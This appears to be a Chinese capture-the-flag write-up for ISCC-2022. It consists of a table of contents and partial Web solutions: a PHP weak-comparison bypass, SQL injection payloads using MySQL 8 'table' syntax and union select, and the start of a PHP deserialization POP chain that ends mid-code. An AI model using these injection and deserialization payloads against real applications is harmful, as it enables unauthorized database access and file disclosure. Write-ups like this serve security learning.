ISCC-2022 部分wp

目录

• Web
• • 冬奥会
  • • 解题步骤
    • 详细描述
    • 解题收获
  • Easy_sql
  • • 解题步骤
    • 详细描述
    • 解题收获
  • Pop2022
  • • 解题步骤
    • 详细描述
    • • 解题收获
  • findme
  • • 解题步骤
    • 详细描述
  • 爱国敬业好青年-2
  • • 解题步骤
    • 详细描述
    • 解题收获
  • 这是一道代码审计题
• Misc
• • 单板小将苏翊鸣
  • • 解题步骤
    • 详细描述
    • 解题收获
  • 2022冬奥会
  • • 解题步骤
    • 详细描述
    • 解题收获
  • 隐秘的信息
  • • 解题步骤
    • 详细描述
    • 解题收获
  • 降维打击
  • • 解题步骤
    • 详细描述
    • 解题收获
  • 藏在星空中的诗-1
  • • 解题步骤
    • 具体描述
    • 解题收获
  • 藏在星空中的诗-2
  • • 解题步骤
    • 具体描述
    • 解题收获
  • 套中套
  • • 解题思路
    • 具体描述
    • 解题收获
  • 真相只有一个
  • • 解题步骤
    • 详细描述
    • 解题收获
• Reverse
• • GetTheTable
  • • 解题步骤
    • 详细描述
    • 解题收获
  • Amy’s Code
  • • 解题步骤
    • 具体描述
    • 解题收获
  • How_decode
  • • 解题步骤
    • 详细描述
    • 解题收获
  • Sad Code
  • • 解题步骤
    • 详细描述
    • 解题收获
  • Bob’s Code
• PWN
• • create_id
  • • 解题步骤
    • 详细描述
    • 解题收获
  • sim_treasure
  • • 解题步骤
    • 详细描述
    • 解题收获
• Mobile
• • Mobile1
  • • 解题步骤
    • 具体描述
    • 解题收获

Web

冬奥会

解题步骤

弱比较

详细描述

题干

 $val){
            $val==="skiing"?die("Sorry~"):NULL;
        }
        $Step2=True;
    }
}
if($Step1 && $Step2){
    include "2022flag.php";echo $flag;
}
?> 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

$info[“year”]=2022，if比较的赋值，永真
0项值为0绕过array_search()函数，其他随意
payload：

?Information={"year":"a","items":[0,["1","2","3"],"1"]}
1

解题收获

“弱类型就是如此神奇”

Easy_sql

解题步骤

MySQL8新特性利用

详细描述

sqlmap跑得mysql数据库版本为8，利用MySQL8新特性进行绕过 select

题目说邮箱忘记了，猜测表名为emails
payload: id=-1 union table emails limit 7,1
第七行第一条数据显示有一个压缩包文件
源码中可以看到username无任何过滤，
payload: usernmae=1' union select 1,0x61646d696e,3#&passwd=3

解题收获

学到了mysql8的table

Pop2022

解题步骤

Road_is_Long->wakeup()(preg_match)->toString()(输出不存在的对象)->Make_a_Change->get()->Try_Work_Hard->invoke()(函数调用)->append()->include(包含flag)

详细描述

page = $file;
    }
    public function __toString(){
        echo '__toString';
        return $this->string->page;
    }
 
    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|../i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}
 
class Try_Work_Hard{
    protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}
 
class Make_a_Change{
    public $effort;
    public function __construct(){
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34